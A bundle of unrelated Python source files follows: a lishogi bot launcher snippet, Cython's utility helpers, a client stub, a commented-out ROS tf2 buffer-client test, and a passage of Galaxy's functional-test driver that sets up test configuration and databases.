enable_color_logging(debug_lvl=logging.DEBUG if args.v else logging.INFO)
logger.info(intro())
CONFIG = load_config(args.config or "./config.yml")
li = lishogi.Lishogi(CONFIG["token"], CONFIG["url"], __version__)
user_profile = li.get_profile()
username = user_profile["username"]
is_bot = user_profile.get("title") == "BOT"
logger.info("Welcome {}!".format(username))
if args.u is True and is_bot is False:
is_bot = upgrade_account(li)
if is_bot:
engine_factory = partial(engine_wrapper.create_engine, CONFIG)
start(li, user_profile, engine_factory, CONFIG)
else:
logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
|
Utils.py | #
# Cython -- Things that don't belong
# anywhere else in particular
#
import os
import sys
import re
import io
import codecs
from contextlib import contextmanager
modification_time = os.path.getmtime
def cached_function(f):
cache = {}
uncomputed = object()
def wrapper(*args):
res = cache.get(args, uncomputed)
if res is uncomputed:
res = cache[args] = f(*args)
return res
return wrapper
def cached_method(f):
cache_name = '__%s_cache' % f.__name__
def wrapper(self, *args):
cache = getattr(self, cache_name, None)
if cache is None:
cache = {}
setattr(self, cache_name, cache)
if args in cache:
return cache[args]
res = cache[args] = f(self, *args)
return res
return wrapper
def replace_suffix(path, newsuf):
base, _ = os.path.splitext(path)
return base + newsuf
def open_new_file(path):
if os.path.exists(path):
# Make sure to create a new file here so we can
# safely hard link the output files.
os.unlink(path)
# we use the ISO-8859-1 encoding here because we only write pure
# ASCII strings or (e.g. for file names) byte encoded strings as
# Unicode, so we need a direct mapping from the first 256 Unicode
# characters to a byte sequence, which ISO-8859-1 provides
# note: can't use io.open() in Py2 as we may be writing str objects
return codecs.open(path, "w", encoding="ISO-8859-1")
def castrate_file(path, st):
# Remove junk contents from an output file after a
# failed compilation.
# Also sets access and modification times back to
# those specified by st (a stat struct).
try:
f = open_new_file(path)
except EnvironmentError:
pass
else:
f.write(
"#error Do not use this file, it is the result of a failed Cython compilation.\n")
f.close()
if st:
os.utime(path, (st.st_atime, st.st_mtime-1))
def file_newer_than(path, time):
ftime = modification_time(path)
return ftime > time
@cached_function
def search_include_directories(dirs, qualified_name, suffix, pos,
include=False, sys_path=False):
# Search the list of include directories for the given
# file name. If a source file position is given, first
# searches the directory containing that file. Returns
# None if not found, but does not report an error.
# The 'include' option will disable package dereferencing.
# If 'sys_path' is True, also search sys.path.
if sys_path:
dirs = dirs + tuple(sys.path)
if pos:
file_desc = pos[0]
from Cython.Compiler.Scanning import FileSourceDescriptor
if not isinstance(file_desc, FileSourceDescriptor):
raise RuntimeError("Only file sources for code supported")
if include:
dirs = (os.path.dirname(file_desc.filename),) + dirs
else:
dirs = (find_root_package_dir(file_desc.filename),) + dirs
dotted_filename = qualified_name
if suffix:
dotted_filename += suffix
if not include:
names = qualified_name.split('.')
package_names = tuple(names[:-1])
module_name = names[-1]
module_filename = module_name + suffix
package_filename = "__init__" + suffix
for dir in dirs:
path = os.path.join(dir, dotted_filename)
if path_exists(path):
return path
if not include:
package_dir = check_package_dir(dir, package_names)
if package_dir is not None:
path = os.path.join(package_dir, module_filename)
if path_exists(path):
return path
path = os.path.join(dir, package_dir, module_name,
package_filename)
if path_exists(path):
return path
return None
@cached_function
def find_root_package_dir(file_path):
dir = os.path.dirname(file_path)
if file_path == dir:
return dir
elif is_package_dir(dir):
return find_root_package_dir(dir)
else:
return dir
@cached_function
def check_package_dir(dir, package_names):
for dirname in package_names:
dir = os.path.join(dir, dirname)
if not is_package_dir(dir):
return None
return dir
@cached_function
def is_package_dir(dir_path):
for filename in ("__init__.py",
"__init__.pyc",
"__init__.pyx",
"__init__.pxd"):
path = os.path.join(dir_path, filename)
if path_exists(path):
return 1
@cached_function
def path_exists(path):
# try on the filesystem first
if os.path.exists(path):
return True
# figure out if a PEP 302 loader is around
try:
loader = __loader__
# XXX the code below assumes a 'zipimport.zipimporter' instance
# XXX should be easy to generalize, but too lazy right now to write it
archive_path = getattr(loader, 'archive', None)
if archive_path:
normpath = os.path.normpath(path)
if normpath.startswith(archive_path):
arcname = normpath[len(archive_path)+1:]
try:
loader.get_data(arcname)
return True
except IOError:
return False
except NameError:
pass
return False
# file name encodings
def decode_filename(filename):
if isinstance(filename, unicode):
return filename
try:
filename_encoding = sys.getfilesystemencoding()
if filename_encoding is None:
filename_encoding = sys.getdefaultencoding()
filename = filename.decode(filename_encoding)
except UnicodeDecodeError:
pass
return filename
# support for source file encoding detection
_match_file_encoding = re.compile(u"coding[:=]\s*([-\w.]+)").search
def detect_file_encoding(source_filename):
f = open_source_file(source_filename, encoding="UTF-8", error_handling='ignore')
try:
return detect_opened_file_encoding(f)
finally:
f.close()
def detect_opened_file_encoding(f):
# PEPs 263 and 3120
# Most of the time the first two lines fall in the first 250 chars,
# and this bulk read/split is much faster.
lines = f.read(250).split(u"\n")
if len(lines) > 1:
m = _match_file_encoding(lines[0])
if m:
return m.group(1)
elif len(lines) > 2:
m = _match_file_encoding(lines[1])
if m:
return m.group(1)
else:
return "UTF-8"
# Fallback to one-char-at-a-time detection.
f.seek(0)
chars = []
for i in range(2):
c = f.read(1)
while c and c != u'\n':
chars.append(c)
c = f.read(1)
encoding = _match_file_encoding(u''.join(chars))
if encoding:
return encoding.group(1)
return "UTF-8"
def skip_bom(f):
"""
Read past a BOM at the beginning of a source file.
This could be added to the scanner, but it's *substantially* easier
to keep it at this level.
"""
if f.read(1) != u'\uFEFF':
f.seek(0)
def open_source_file(source_filename, mode="r",
encoding=None, error_handling=None,
require_normalised_newlines=True):
if encoding is None:
# Most of the time the coding is unspecified, so be optimistic that
# it's UTF-8.
f = open_source_file(source_filename, encoding="UTF-8", mode=mode, error_handling='ignore')
encoding = detect_opened_file_encoding(f)
if (encoding == "UTF-8"
and error_handling == 'ignore'
and require_normalised_newlines):
f.seek(0)
skip_bom(f)
return f
else:
f.close()
if not os.path.exists(source_filename):
try:
loader = __loader__
if source_filename.startswith(loader.archive):
return open_source_from_loader(
loader, source_filename,
encoding, error_handling,
require_normalised_newlines)
except (NameError, AttributeError):
pass
stream = io.open(source_filename, mode=mode,
encoding=encoding, errors=error_handling)
skip_bom(stream)
return stream
def open_source_from_loader(loader,
source_filename,
encoding=None, error_handling=None,
require_normalised_newlines=True):
nrmpath = os.path.normpath(source_filename)
arcname = nrmpath[len(loader.archive)+1:]
data = loader.get_data(arcname)
return io.TextIOWrapper(io.BytesIO(data),
encoding=encoding,
errors=error_handling)
def str_to_number(value):
# note: this expects a string as input that was accepted by the
# parser already
if len(value) < 2:
value = int(value, 0)
elif value[0] == '0':
if value[1] in 'xX':
# hex notation ('0x1AF')
value = int(value[2:], 16)
elif value[1] in 'oO':
# Py3 octal notation ('0o136')
value = int(value[2:], 8)
elif value[1] in 'bB':
# Py3 binary notation ('0b101')
value = int(value[2:], 2)
else:
# Py2 octal notation ('0136')
value = int(value, 8)
else:
value = int(value, 0)
return value
def long_literal(value):
if isinstance(value, basestring):
value = str_to_number(value)
return not -2**31 <= value < 2**31
@cached_function
def get_cython_cache_dir():
"""get the cython cache dir
Priority:
1. CYTHON_CACHE_DIR
2. (OS X): ~/Library/Caches/Cython
(posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined
3. ~/.cython
"""
if 'CYTHON_CACHE_DIR' in os.environ:
return os.environ['CYTHON_CACHE_DIR']
parent = None
if os.name == 'posix':
if sys.platform == 'darwin':
parent = os.path.expanduser('~/Library/Caches')
else:
# this could fallback on ~/.cache
parent = os.environ.get('XDG_CACHE_HOME')
if parent and os.path.isdir(parent):
return os.path.join(parent, 'cython')
# last fallback: ~/.cython
return os.path.expanduser(os.path.join('~', '.cython'))
@contextmanager
def captured_fd(stream=2, encoding=None):
pipe_in = t = None
orig_stream = os.dup(stream) # keep copy of original stream
try:
pipe_in, pipe_out = os.pipe()
os.dup2(pipe_out, stream) # replace stream by copy of pipe
try:
os.close(pipe_out) # close original pipe-out stream
data = []
def copy():
try:
while True:
d = os.read(pipe_in, 1000)
if d:
data.append(d)
else:
break
finally:
os.close(pipe_in)
def get_output():
output = b''.join(data)
if encoding:
output = output.decode(encoding)
return output
from threading import Thread
t = Thread(target=copy)
t.daemon = True # just in case
t.start()
yield get_output
finally:
os.dup2(orig_stream, stream) # restore original stream
if t is not None:
t.join()
finally:
os.close(orig_stream)
def print_bytes(s, end=b'\n', file=sys.stdout, flush=True):
file.flush()
try:
out = file.buffer # Py3
except AttributeError:
out = file # Py2
out.write(s)
if end:
out.write(end)
if flush:
out.flush()
class LazyStr:
def __init__(self, callback):
self.callback = callback
def __str__(self):
return self.callback()
def __repr__(self):
return self.callback()
def __add__(self, right):
return self.callback() + right
def __radd__(self, left):
return left + self.callback()
|
client.py | import threading
#ofc we need a separate class for client, but that's just a skeleton for now
def startClient():
print("started")
def startClicked():
threading.Thread(target = startClient).start()
def main():
start()
if __name__ == "__main__":
main()
|
test_buffer_client.py | # TODO (ahcorde): Fix test in CI
# # Copyright 2019 Open Source Robotics Foundation, Inc.
# # All rights reserved.
# #
# # Redistribution and use in source and binary forms, with or without
# # modification, are permitted provided that the following conditions
# # are met:
# #
# # * Redistributions of source code must retain the above copyright
# # notice, this list of conditions and the following disclaimer.
# # * Redistributions in binary form must reproduce the above
# # copyright notice, this list of conditions and the following
# # disclaimer in the documentation and/or other materials provided
# # with the distribution.
# # * Neither the name of the Willow Garage nor the names of its
# # contributors may be used to endorse or promote products derived
# # from this software without specific prior written permission.
# #
# # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# # POSSIBILITY OF SUCH DAMAGE.
#
# import time
# import unittest
# import rclpy
# import threading
#
# from tf2_ros.buffer_client import BufferClient
# from geometry_msgs.msg import TransformStamped
# from tf2_msgs.action import LookupTransform
# from tf2_py import BufferCore, TransformException, TimeoutException, \
# LookupException, InvalidArgumentException, ExtrapolationException, ConnectivityException
# from rclpy.executors import SingleThreadedExecutor
# from tf2_msgs.msg import TF2Error
#
#
# def build_transform(target_frame, source_frame, stamp):
# transform = TransformStamped()
# transform.header.frame_id = target_frame
# transform.header.stamp = stamp
# transform.child_frame_id = source_frame
#
# transform.transform.translation.x = 42.0
# transform.transform.translation.y = -3.14
# transform.transform.translation.z = 0.0
# transform.transform.rotation.w = 1.0
# transform.transform.rotation.x = 0.0
# transform.transform.rotation.y = 0.0
# transform.transform.rotation.z = 0.0
#
# return transform
#
#
# class MockActionServer():
# def __init__(self, node, buffer_core):
# self.goal_srv = node.create_service(
# LookupTransform.Impl.SendGoalService, '/lookup_transform/_action/send_goal',
# self.goal_callback)
# self.cancel_srv = node.create_service(
# LookupTransform.Impl.CancelGoalService, '/lookup_transform/_action/cancel_goal',
# self.cancel_callback)
# self.result_srv = node.create_service(
# LookupTransform.Impl.GetResultService, '/lookup_transform/_action/get_result',
# self.result_callback)
# self.feedback_pub = node.create_publisher(
# LookupTransform.Impl.FeedbackMessage, '/lookup_transform/_action/feedback', 1)
# self.node = node
# self.buffer_core = buffer_core
# self.result_buffer = {}
#
# def goal_callback(self, request, response):
# response.accepted = True
# bytes_goal_id = bytes(request.goal_id.uuid)
# try:
# if not request.goal.advanced:
# transform = self.buffer_core.lookup_transform_core(target_frame=request.goal.target_frame,
# source_frame=request.goal.source_frame,
# time=request.goal.source_time)
# self.result_buffer[bytes_goal_id] = (
# transform, TF2Error.NO_ERROR, '')
# else:
# transform = self.buffer_core.lookup_transform_full_core(
# target_frame=request.goal.target_frame,
# source_frame=request.goal.source_frame,
# source_time=request.goal.source_time,
# target_time=request.goal.target_time,
# fixed_frame=request.goal.fixed_frame
# )
# self.result_buffer[bytes_goal_id] = (
# transform, TF2Error.NO_ERROR, ''
# )
# except TimeoutException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.TIMEOUT_ERROR, e)
# except LookupException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.LOOKUP_ERROR, e)
# except InvalidArgumentException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.INVALID_ARGUMENT_ERROR, e)
# except ExtrapolationException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.EXTRAPOLATION_ERROR, e)
# except ConnectivityException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.CONNECTIVITY_ERROR, e)
# except TransformException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.TRANSFORM_ERROR, e)
#
# return response
#
# def cancel_callback(self, request, response):
# response.goals_canceling.append(request.goal_info)
# return response
#
# def result_callback(self, request, response):
# bytes_goal_id = bytes(request.goal_id.uuid)
# response.result.transform = self.result_buffer[bytes_goal_id][0]
# response.result.error = TF2Error(
# error=self.result_buffer[bytes_goal_id][1],
# error_string=str(self.result_buffer[bytes_goal_id][2]))
# return response
#
# def publish_feedback(self, goal_id):
# feedback_message = LookupTransform.Impl.FeedbackMessage()
# feedback_message.goal_id = goal_id
# self.feedback_pub.publish(feedback_message)
#
#
# class TestBufferClient(unittest.TestCase):
# @classmethod
# def setUpClass(cls):
# cls.context = rclpy.context.Context()
# rclpy.init(context=cls.context)
# cls.executor = SingleThreadedExecutor(context=cls.context)
# cls.node = rclpy.create_node('TestBufferClient', context=cls.context)
# cls.executor.add_node(cls.node)
#
# buffer_core = BufferCore()
# transform = build_transform('foo', 'bar', rclpy.time.Time().to_msg())
# buffer_core.set_transform(transform, 'unittest')
#
# cls.mock_action_server = MockActionServer(cls.node, buffer_core)
#
# @classmethod
# def tearDownClass(cls):
# cls.node.destroy_node()
# rclpy.shutdown(context=cls.context)
#
# def setUp(self):
# self.spinning = threading.Event()
# self.spin_thread = threading.Thread(target=self.spin)
# self.spin_thread.start()
# return
#
# def tearDown(self):
# self.spinning.set()
# self.spin_thread.join()
# return
#
# def feedback_callback(self, feedback):
# self.feedback = feedback
#
# def spin(self):
# try:
# while self.context.ok() and not self.spinning.is_set():
# self.executor.spin_once(timeout_sec=0.05)
# finally:
# return
#
# def timed_spin(self, duration):
# start_time = time.time()
# while (time.time() - start_time) < duration:
# rclpy.spin_once(self.node, executor=self.executor, timeout_sec=0.1)
#
# def execute_goal_callback(self, goal_handle):
# print('execute_goal_callback')
# goal_handle.set_succeeded()
# return LookupTransform.Result()
#
# def test_lookup_transform_true(self):
# buffer_client = BufferClient(
# self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
#
# result = buffer_client.lookup_transform(
# 'foo', 'bar', rclpy.time.Time(), rclpy.duration.Duration(seconds=5.0))
#
# self.assertEqual(build_transform(
# 'foo', 'bar', rclpy.time.Time().to_msg()), result)
#
# def test_lookup_transform_fail(self):
# buffer_client = BufferClient(
# self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
#
# with self.assertRaises(LookupException) as ex:
# result = buffer_client.lookup_transform(
# 'bar', 'baz', rclpy.time.Time(), rclpy.duration.Duration(seconds=5.0))
#
# self.assertEqual(LookupException, type(ex.exception))
#
# if __name__ == '__main__':
# unittest.main()
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import logging
import os
import random
import re
import shutil
import signal
import string
import subprocess
import sys
import tempfile
import threading
import time
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from six.moves import (
http_client,
shlex_quote
)
from six.moves.urllib.parse import urlparse
from sqlalchemy_utils import (
create_database,
database_exists,
)
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy_test.base.api_util import get_master_api_key, get_user_api_key
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = os.path.realpath(tempfile.mkdtemp())
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
os.environ['TOOL_SHED_TEST_TMP_DIR'] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
prefer_template_database=False,
log_format=None,
conda_auto_init=False,
conda_auto_install=False,
use_shared_connection_for_amqp=False,
):
"""Setup environment and build config for test Galaxy instance."""
# For certain docker operations this needs to be evaluated out - e.g. for cwltool.
tmpdir = os.path.realpath(tmpdir)
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = None
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = 'test/functional/tools/sample_data_manager_conf.xml'
if default_data_manager_config is not None:
data_manager_config_file = "{},{}".format(default_data_manager_config, data_manager_config_file)
master_api_key = get_master_api_key()
cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ or
"TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = "{},{}".format(tool_conf, shed_tool_conf)
# Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
# their parent directories, as per schema.
data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
tool_config_file = _resolve_relative_config_paths(tool_conf)
tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
chunk_upload_size=100,
conda_prefix=conda_prefix,
conda_auto_init=conda_auto_init,
conda_auto_install=conda_auto_install,
cleanup_job=cleanup_job,
retry_metadata_internally=False,
data_dir=tmpdir,
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
ftp_upload_purge=False,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
logging=LOGGING_CONFIG_DEFAULT,
monitor_thread_join_timeout=5,
object_store_store_by="uuid",
simplified_workflow_run_ui="off",
)
if default_shed_tool_data_table_config:
config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
if not use_shared_connection_for_amqp:
config["amqp_internal_connection"] = "sqlalchemy+sqlite:///%s?isolation_level=IMMEDIATE" % os.path.join(tmpdir, "control.sqlite")
config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
with open(object_store_config, "w") as f:
contents = """
type: hierarchical
backends:
- id: files1
type: disk
weight: 1
files_dir: "${temp_directory}/files1"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp1"
- type: job_work
path: "${temp_directory}/job_working_directory1"
- id: files2
type: disk
weight: 1
files_dir: "${temp_directory}/files2"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp2"
- type: job_work
path: "${temp_directory}/job_working_directory2"
"""
contents_template = string.Template(contents)
expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
f.write(expanded_contents)
config["object_store_config_file"] = object_store_config
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff
# TODO: read from Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(','):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ','.join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# the sample data for functional tests to that.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = 'test/functional/tool-data/sample_tool_data_tables.xml'
tool_data_table_config_path = '%s,%s' % (default_tool_data_config, test_tool_data_config)
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if ignore_files is None:
ignore_files = []
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin(StructuredTestDataPlugin())
test_config.configure(argv)
result = run(test_config)
success = result.wasSuccessful()
return success
def copy_database_template(source, db_path):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
try:
download_to_file(source, db_path)
except Exception as e:
# We log the exception but don't fail startup, since we can
# do all migration steps instead of downloading a template.
log.exception(e)
else:
raise Exception("Failed to copy database template from source %s" % source)
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
check_migrate_databases = True
dburi_var = "%s_TEST_DBURI" % prefix
template_name = None
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
# only template if postgres - not mysql or sqlite
do_template = prefer_template_database and database_connection.startswith("p")
if do_template:
database_template_parsed = urlparse(database_connection)
template_name = database_template_parsed.path[1:] # drop / from /galaxy
actual_db = "gxtest" + ''.join(random.choice(string.ascii_uppercase) for _ in range(10))
